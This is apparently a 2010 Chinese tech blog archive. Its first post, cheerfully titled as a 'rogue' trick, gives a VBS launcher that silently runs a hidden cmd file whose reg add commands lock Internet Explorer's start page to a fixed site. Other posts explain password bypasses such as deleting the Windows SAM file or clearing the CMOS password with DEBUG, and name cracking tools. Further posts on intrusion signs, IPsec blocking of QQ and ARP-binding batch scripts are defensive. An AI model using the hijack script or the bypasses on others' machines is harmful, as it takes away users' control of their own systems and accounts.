我是流氓我怕谁:锁定IE主页绑定制定页面
11:08 , 北纬36度
什么都不说了:我是流氓我怕谁:锁定IE主页绑定制定页面。
直接看代码:
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\home.cmd", 0, TRUE)
上代码保存为Run.vbs
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.736202.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.736202.com /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.736202.com/" /f
上代码保存为home.cmd(bat)都可以。
下載檔案
剩下的自己发挥吧!呵呵!
直接看代码:
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\home.cmd", 0, TRUE)
上代码保存为Run.vbs
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.736202.com /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.736202.com /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.736202.com/" /f
上代码保存为home.cmd(bat)都可以。
下載檔案 剩下的自己发挥吧!呵呵!
Jul
4
2010
一、遗忘了SYSTEM密码
如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了, 解决的办法只能是:打开机箱,把电池取下、正负极短接,给 CMOS放电,清除CMOS中的所有内容(当然也就包括密码),然后 重新开机进行设置。
注意:有些主板设置了CMOS密码清除跳线,请参 照主板说明书将该跳线短接,这样也可以清除CMOS密码。
二、遗忘了SETUP密码
遗忘了该密码,就不能进行CMOS设置了。如果你能使用计算机 ,但不能进入CMOS设置,可以这样解决:在DOS状态下启动DEBUG ,然后输入如下命令手工清除SETUP密码:
_ o 70 16
_ o 71 16
_ q
你也可以 用CMOS密码破解软件来 显示CMOS密码,这样的软件有很多,例如Cmospwd,它支持Acer、AMI、AWARD、COMPAQ、DELL、IBM、 PACKARD BELL、PHOENIX、ZENITH AMI等多种BIOS),在DOS下启动该程序,CMOS密码就会显示出来 .
三、遗忘了windows登录密码
WinMe/98下对策:开机后按F8键选择DOS启动,然后删除windows 安装目录下的*.PWL密码文件、以及Profiles子目录下的所有个 人信息文件,重新启动windows后,系统会弹出一个不包含任何 用户名的密码设置框,此时无需输入任何内容,直接单击“确 定”,登录密码即被删除。
另外,将注册表数据库HKEY_LOCAL_MACHINE、Network、Logon 分支下的UserProfiles修改为“0”,然后重新启动windows也 可达到同样目的。
WinXP/2000下对策:删除系统安装目录\system32 \config下的SAM文件,重新启动,此时管理员Administrator账 号已经没有密码了,用Administrator帐户登陆系统,不用输入 任何密码,进入系统后再重新设置登陆帐户密码即可。
四、遗忘了windows屏保密码
解决方法:在开机后按F8键,选择安全模式启动,进入windows 后,右击桌面空白处,从弹出的快捷菜单中选择“属性”/屏幕 保护,取消“密码保护”即可。
五、遗忘了windows电源管理密码
windows的电源管理功能也可以设置密码,启用此功能后,当系 统从节能状态返回时就会要求输入密码。
如果你遗忘了该密码,可以使用前面破解windows登录密码的那 种方法去破解。
六、遗忘了微软Office密码
解决方法:使用破解Office系列文档密码的软件,这样的软件有 很多,例如AOPR,该软 件可以同时对微软Office系列Word、Excel及Access等软件所生 成的密码进行破解,还可以对Word的*.DOT模板文件的密码进行 搜索。
七、遗忘了WinZip压缩包密码
解决方法:用软件UZPC(Ultra Zip Password cracker,找回丢失的密码。使用该软件时要先设置适当的解密 方式,例如“后门方式”、“穷举方式”、“字典方式”和“ 模式匹配方式”等,一般采用“Brute Force穷举方式”,然后软件就会对所有可能的密码进行测试, 直至找出最后的结果。
八、遗忘了RAR压缩包密码
遗忘了RAR压缩包密码后,你可下载一个CRARK软件来对其进行破解,它主要通过命令 行来实现对RAR压缩包的密码进行破解。使用时一般只需直接使 用“CRARK RAR压缩包文件名”命令,利用缺省参数即可进行破解。
九、遗忘了qq/ICQ密码
为保护QQ密码,你应该赶快到这里 申请密码保护。假如你忘记了qq密码、或者密码被盗时 ,只需填写正确的信息即可取回。
如果你要找回 ICQ密码,可以使用软件ICQ Password Revealer,这是一个DOS下的命令 行实用软件,你只需在ICQ安装文件夹的NEWDB子文件夹下执行 该文件,然后按照屏幕提示输入自己的UIN,系统即会找回“久 违”的ICQ密码。
十、遗忘了OE密码
如果你忘 了密码,无法进入OutLook Express阅读收到的邮件、使用通讯簿等,可以这样破解:重启 计算机并按F8,选择“安全模式”,再启动OE就不需要密码了 ,然后你可以重建一个用户(不能修改密码),把信息导入新用 户信箱即可。
十一、遗忘了Foxmail帐户密码
解决方法:消除忘记的Foxmail帐户密码。首先打开Foxmail,新 建一个帐户(帐户名任意,例如如lacl1),然后退出Foxmail;运 行windows资源管理器,找到Foxmail\MAIL\lacl1文件夹,里边 有个“account.stg”,把它复制到忘记密码的帐户(例如 “lacl”)目录中,直接覆盖原来的“account.stg”文件;再重 新运行Foxmail,打开忘记密码的帐户,呵呵,怎么连“口令提 示框”也没有?现在你就可以直接打开忘记密码的帐户,而且帐 户中原来的邮件一封都不会少!
十二、查看“*”密码
许多密码在屏幕上都是以“*”显示的,因此我们无法直接看到 密码的原始字符,如果你使用专门破解“*”密码的软件,即可 查出这些密码的原始字符。
这样的软件有很多,例如Win2000/Win98下你可用iOpus Password Recovery,WinXP下可用Password Spectator Pro .使用时,只需先打开显示“*”的窗口,启动这类软件,然后 按住Ctrl键、在密码栏中按下鼠标左键,这些“*”密码的原始 字符就会显示出来了。
类别:MY IT TEXT | Tags: 电脑 | 0 条评论, 362 次阅读
Jul
4
2010
如何及时地发现黑客的入侵,找到入侵者并采取有效的解决措施是非常关键的。
如何发现入侵者
系统被入侵而全无知晓恐怕是最糟糕的事情了,下面就将以unix系统为例告诉你如何在分析网络异常现象的基础上确定你的网络系统是否有入侵者。
异常的访问日志
入侵者在入侵并控制系统之前,往往会用扫描工具或者手动扫描的方法来探测系统,以获取更多的信息。而这种扫描行为都会被系统服务日志记录下来。比如:一个IP连续多次出现在系统的各种服务日志中,并试图越漏洞;又如一个IP连续多次在同一系统多个服务建立了空连接,这很有可能是入侵者在搜集某个服务的版本信息。
注意!在 unix 操作系统中如果有人访问了系统不必要的服务或者有严重安全隐患的服务比如:finger、rpc;或者在 Telnet、FTP、POP3 等服务日志中连续出现了大量的连续性失败登录记录,则很有可能是入侵者在尝试猜测系统的密码。这些都是攻击的前兆!
网络流量增大
如果发现服务器的访问流量突然间增大了许多,这就预示着你的系统有可能已经被入侵者控制,并被入侵用来扫描和攻击其他的服务器。事实证明,许多入侵者都是利用中介主机对远程主机进行扫描并找出安全漏洞,然后再进行攻击的。而这些行为都会造成网络流量突然增大。
非法访问
如果你发现某个用户试图访问控制并修改/etc/shadow、系统日志和系统配置文件,那么很有可能这个用户已经被入侵者控制,并且试图夺取更高的权限。
正常服务终止
比如系统的日志服务突然奇怪的停掉,或你的IDS程序突然终止,这都暗示着入侵者试图要停掉这些有威胁的服务,以避免在系统日志上留下“痕迹”。
可疑的进程或非法服务的出现
系统中任何可疑的进程都应该仔细检查,比如以root启动的http服务,或系统中本来关闭的服务又重新被启动。这些可疑进程和服务都有可能是入侵者启动的攻击进程、后门进程或Sniffer进程。
系统文件或用户
入侵者通常会更改系统中的配置文件来逃避追查,或者加载后门、攻击程序之类的软件以方便下次进入。比如对于unix而言,入侵者或修改syslog.conf文件以去掉secure的条目来躲避login后门的审计,或修改hosts.deny、hosts.allow来解除tcpwrapper对入侵者IP的过滤;甚至增加一个条目在rc.d里面,以便系统启动的时候同时启动后门程序。所以被非法修改的系统文件或莫明其妙地增加了一个用户等一些现象都意味着你的系统很可能被入侵者控制了。
可疑的数据
系统如果发现了命名为诸如空格、点点加空格、“..^M”(点点ctrl+M)、“...”(点点点)等可疑的目录,就需要留心了,因为入侵者经常在这样的目录中使用和隐藏文件,如有些目录里面可能会(特别是/tmp目录中)出现扫描器产生的临时文件。
Jul
4
2010
局域网封锁QQ方法
1.单击“开始”菜单->“程序”->“管理工具”->“本地安全设置”,打开本地安全策略。
2.右击左边树中的“IP安全策略,在本地机器”,选项“创建IP安全策略”,启动“IP安全策略向导”.
3.跳过向导中的欢迎页面,进入“IP安全策略名称”页面,取一个好听的名字,就叫“封锁qq”吧,描述可填可不填,按
下一下继续。
4.在“安全通讯请求”页面,将“激活默认响应规则”前面的勾去掉,即不选中它。按下一步继续。
5.在完成IP安全策略向导而,选中“编辑属性”选项,这个是默认选中的。按完成。
6.向导关闭后会跳出“封锁qq属性”对话框,有两个标签:规则与常规。我们用到的是规则中的内容。
7.按“规则”标签下面的“添加”按钮,启动“安全规则向导”,跳过欢迎页面,按下一步继续。
8.在“隧道终结点”页面使用缺省的项“此规则不指定隧道”.按下一下继续。
9.在“网络类型”页面中选择合适的网络类型,使用缺省的“所有网络连接”就行。按下一步继续。
10.在“身份验证方法”页面使用缺省的“windows 2000默认值(Kerberos V5协议)”即可。按下一下继续。
11.在“IP筛选器列表”页面中,按“添加”按钮添加新的IP筛选器。
12.在跳出的“IP筛选器列表”对话框中,为这个筛选器取个名字,我们即“qq筛选器”,按“添加”启动“IP筛选器向导
”,跳过欢迎页面,按下一步继续。
13.在“IP通信源”页面中源地址使用“我的IP地址”,按下一下继续。
14.在“IP通信目录”页面中目标地址使用“任何IP地址”,这儿也可以直接使用腾讯的服务器地址,但由于有好几个
服务器,因此直接使用“任何IP地址”方便些。按下一步继续。
15.在“IP协议类型”页面,协议类型请选择“UDP”,按下一步继续。
16.在“IP协议端口”页面,选中“从此端口”,下面端口号填“4000”.其它使用缺省值。按下一步继续。
17.在完成页面按完成。回到“IP筛选器列表”对话框。按“关闭”回到“安全规则向导”的“IP筛选器列表”页面。选中
列表中的“qq筛选器”,按下一步继续。
18.在“筛选器操作”页面,选择一个适合的筛选器操作。这儿我们建立一个。按页面上的“添加”按钮,启动“筛选器
操作向导”.
19.跳过欢迎页面,在第二页的“筛选器操作名称”页面填写一个好听的名字,就叫“拒绝qq”吧,按下一步继续。
20.在“筛选器操作常规选项”页面选中“阻止”.按下一步继续。完成筛选器操作添加。
21.回到“安全规则向导”的“筛选器操作”页面,选中我们刚才建立的“拒绝qq”这一操作。按下一步继续。
22.在“完成安全规则”向导页面,不选中“编辑属性”,按完成,完成全部操作。回到“本地安全设置”MMC管理单元。
我们会在右边的详细资料窗格内看到我们新建的IP安全策略“封锁qq”,但现在它还没有被指派,即还没有起作用。
23.指派。右击“封锁qq”这一IP安全策略,选中“指派”.注意,在同一时间,只有一个IP安全策略被指派,如果你指派
了封锁qq,你的其它安全策略将会自动失效。
24.等待策略生效或使用命令直接刷新策略,命令如下:
secedit /refreshpolicy machine_policy /enforce
策略会即时生效。现在我的qq就离线了,看来我刚才设置的策略生效了。:)
1.单击“开始”菜单->“程序”->“管理工具”->“本地安全设置”,打开本地安全策略。
2.右击左边树中的“IP安全策略,在本地机器”,选项“创建IP安全策略”,启动“IP安全策略向导”.
3.跳过向导中的欢迎页面,进入“IP安全策略名称”页面,取一个好听的名字,就叫“封锁qq”吧,描述可填可不填,按
下一下继续。
4.在“安全通讯请求”页面,将“激活默认响应规则”前面的勾去掉,即不选中它。按下一步继续。
5.在完成IP安全策略向导而,选中“编辑属性”选项,这个是默认选中的。按完成。
6.向导关闭后会跳出“封锁qq属性”对话框,有两个标签:规则与常规。我们用到的是规则中的内容。
7.按“规则”标签下面的“添加”按钮,启动“安全规则向导”,跳过欢迎页面,按下一步继续。
8.在“隧道终结点”页面使用缺省的项“此规则不指定隧道”.按下一下继续。
9.在“网络类型”页面中选择合适的网络类型,使用缺省的“所有网络连接”就行。按下一步继续。
10.在“身份验证方法”页面使用缺省的“windows 2000默认值(Kerberos V5协议)”即可。按下一下继续。
11.在“IP筛选器列表”页面中,按“添加”按钮添加新的IP筛选器。
12.在跳出的“IP筛选器列表”对话框中,为这个筛选器取个名字,我们即“qq筛选器”,按“添加”启动“IP筛选器向导
”,跳过欢迎页面,按下一步继续。
13.在“IP通信源”页面中源地址使用“我的IP地址”,按下一下继续。
14.在“IP通信目录”页面中目标地址使用“任何IP地址”,这儿也可以直接使用腾讯的服务器地址,但由于有好几个
服务器,因此直接使用“任何IP地址”方便些。按下一步继续。
15.在“IP协议类型”页面,协议类型请选择“UDP”,按下一步继续。
16.在“IP协议端口”页面,选中“从此端口”,下面端口号填“4000”.其它使用缺省值。按下一步继续。
17.在完成页面按完成。回到“IP筛选器列表”对话框。按“关闭”回到“安全规则向导”的“IP筛选器列表”页面。选中
列表中的“qq筛选器”,按下一步继续。
18.在“筛选器操作”页面,选择一个适合的筛选器操作。这儿我们建立一个。按页面上的“添加”按钮,启动“筛选器
操作向导”.
19.跳过欢迎页面,在第二页的“筛选器操作名称”页面填写一个好听的名字,就叫“拒绝qq”吧,按下一步继续。
20.在“筛选器操作常规选项”页面选中“阻止”.按下一步继续。完成筛选器操作添加。
21.回到“安全规则向导”的“筛选器操作”页面,选中我们刚才建立的“拒绝qq”这一操作。按下一步继续。
22.在“完成安全规则”向导页面,不选中“编辑属性”,按完成,完成全部操作。回到“本地安全设置”MMC管理单元。
我们会在右边的详细资料窗格内看到我们新建的IP安全策略“封锁qq”,但现在它还没有被指派,即还没有起作用。
23.指派。右击“封锁qq”这一IP安全策略,选中“指派”.注意,在同一时间,只有一个IP安全策略被指派,如果你指派
了封锁qq,你的其它安全策略将会自动失效。
24.等待策略生效或使用命令直接刷新策略,命令如下:
secedit /refreshpolicy machine_policy /enforce
策略会即时生效。现在我的qq就离线了,看来我刚才设置的策略生效了。:)
Jul
4
2010
ARP防御之双绑批处理+++集合
17:11 , 北纬36度
一:此批处理有缺陷,有时不能实现真正意义的双绑!
以下是代码片段:
@echo off
::读取本机Mac地址
if exist ipconfig.txt del ipconfig.txt
ipconfig /all >ipconfig.txt
if exist phyaddr.txt del phyaddr.txt
find "Physical Address" ipconfig.txt >phyaddr.txt
for /f "skip=2 tokens=12" %%M in (phyaddr.txt) do set Mac=%%M
::读取本机ip地址
if exist IPAddr.txt del IPaddr.txt
find "IP Address" ipconfig.txt >IPAddr.txt
for /f "skip=2 tokens=15" %%I in (IPAddr.txt) do set IP=%%I
::绑定本机IP地址和MAC地址
arp -s %IP% %Mac%
::读取网关地址
if exist GateIP.txt del GateIP.txt
find "Default Gateway" ipconfig.txt >GateIP.txt
for /f "skip=2 tokens=13" %%G in (GateIP.txt) do set GateIP=%%G
::读取网关Mac地址
if exist GateMac.txt del GateMac.txt
arp -a %GateIP% >GateMac.txt
for /f "skip=3 tokens=2" %%H in (GateMac.txt) do set GateMac=%%H
::绑定网关Mac和IP
arp -s %GateIP% %GateMac%
arp -s 网关IP 网关MAC
exit
这个批处理要查询本机的ARP 缓存表,看里面是不是有网关的IP和MAC,有则能成功
绑定,但是没有的话就绑不定了!!!不过可以改进一下,达到双绑的目的,比如
加上arp -s 网关IP 网关MAC一行就可以了。。。
二、这个也不能实现真正意义的双绑,只能绑定本机IP和MAC
以下是代码片段:
@echo off
for /f "delims=: tokens=2" %%a in ('ipconfig /all^|find "Physical Address"') do set local_mac=%%a
for /f "delims=: tokens=2" %%a in ('ipconfig /all^|find "IP Address"') do set local_ip=%%a
for /f "delims=: tokens=2" %%a in ('ipconfig /all^|find "Default Gateway"') do set gate_ip=%%a
fo* /* %%* in ('getmac /nh /s %local_ip%') do set gate_mac=%%a
arp -s %local_ip% %local_mac%
arp -s %gate_ip% %gate_mac% (这个地方有问题,改进中……)
经测试,此批处理不能绑定网关IP和MAC,只能绑定本机IP和MAC
三、这个还不是很清楚,我要测试才行的,目前所知也能绑定本机IP和MAC
以下是代码片段:
@ECHO OFF
SETLOCAL ENABLEDELAYEDEXPANSION
for /f "tokens=2 delims=[]=" %%i in ('nbtstat -a %COMPUTERNAME%') do call set local=!local!%%i
for /f "tokens=3" %%i in ('netstat -r^|find " 0.0.0.0"') do set gm=%%i
for /f "tokens=1,2" %%i in ('arp -a %gm%^|find /i /v "inter"') do set gate=%%i %%j
arp -s %gate%
arp -s %local%
arp -s 网关IP 网关MAC
这个批处理可以绑定网关IP和MAC,但是还是有缺陷,要依赖于本机上存在的ARP缓存!
改进方法为在最后加一个arp -s 网关IP和MAC!
四、原理和第一个一样,只是改进了一点点!
这个P通过ping网关三次得到了网关的MAC其实以上的批都可以通过这个来搞定网关的IP和MAC,
但是如果开机的时候正在发生ARP欺骗的话 这样你绑的IP和MAC就是错的,不能上网了。不过这种情况很少,发过来试一下先吧!
以下是代码片段:
@echo off
:::::::::::::清除所有的ARP缓存
arp -d
:::::::::::::读取本地连接配置
ipconfig /all>ipconfig.txt
:::::::::::::读取内网网关的IP
for /f "tokens=13" %%I in ('find "Default Gateway" ipconfig.txt') do set GatewayIP=%%I
:::::::::::::PING三次内网网关
ping %GatewayIP% -n 3
:::::::::::::读取与网关arp缓存
arp -a|find "%GatewayIP%">arp.txt
:::::::::::::读取网关MAC并绑定
for /f "tokens=1,2" %%I in ('find "%GatewayIP%" arp.txt') do if %%I==%GatewayIP% arp -s %%I %%J
:::::::::::::读取本机的 IP+MAC
for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do set ip=%%i
for /f "tokens=12" %%i in ('find "Physical Address" ipconfig.txt') do set mac=%%i
:::::::::::::绑定本机的 IP+MAC
arp -s %ip% %mac%
:::::::::::::删除所有的临时文件
del ipconfig.txt
del arp.txt
exit
以上P可以配合路由上对客户机的IP和MAC进行绑定实现完全防ARP,只是单绑下面机和网关IP及MAC
没有多大用处,关于路由上面的,因为大家用的路由不一样,所以这个就不写了!
Jul
2
2010
